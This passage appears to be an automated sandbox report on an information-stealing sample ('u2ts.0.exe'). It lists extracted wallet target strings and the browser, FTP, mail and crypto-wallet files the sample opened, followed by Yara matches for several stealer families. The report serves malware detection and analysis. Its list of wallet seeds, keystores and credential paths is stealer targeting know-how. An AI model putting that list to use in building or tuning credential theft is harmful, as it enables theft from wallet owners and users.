Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 4.2.cmd.exe.5b000c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.5b600c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.5b600c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.MSBuild.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cmd.exe.5b000c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.2874374264.0000000005B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2614325718.0000000005B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2871918307.0000000001202000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2528909810.0000000000447000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u2ts.0.exe PID: 5256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\jipsoiol, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\dvffdl, type: DROPPED

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: 2.2.u2ts.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.3500e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.3500e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.u2ts.0.exe.3530000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.u2ts.0.exe.3530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.2019835601.0000000003530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2530861686.0000000003500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2528909810.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21732000000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21732000000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21729406ca8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217294b49f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2172952eb15.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171726d525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171729432f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f3537d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f54dad.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217172b8739.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f447a3.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2450353895.0000021713EAB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 4.2.cmd.exe.5b000c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.5b600c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.5b600c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.MSBuild.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cmd.exe.5b000c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.2874374264.0000000005B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2614325718.0000000005B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2871918307.0000000001202000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\jipsoiol, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\dvffdl, type: DROPPED

Yara detected SectopRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 5564, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u2ts.0.exe PID: 5256, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 2.2.u2ts.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.3500e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.3500e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.u2ts.0.exe.3530000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.u2ts.0.exe.3530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.2019835601.0000000003530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2530861686.0000000003500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2528909810.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u2ts.0.exe PID: 5256, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21729406ca8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171726d525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171729432f.7.raw.unpack, type: UNPACKEDPE
